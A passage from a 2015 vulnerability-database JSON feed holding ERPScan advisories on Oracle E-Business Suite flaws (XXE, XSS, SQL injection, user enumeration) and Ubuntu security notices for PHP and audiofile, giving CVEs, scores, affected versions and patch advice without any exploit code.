CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVunerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "title": "apport security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. (CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4854"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality None (N)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting (XSS) due\r\nto lack of sanitizing the "domain" parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32658", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4851"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-030]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4851\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/oramipp_lpr\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32655", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32655", "title": "[ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) High (H)\r\nAu : Authentication (Level of authentication needed to exploit) Single (S)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, 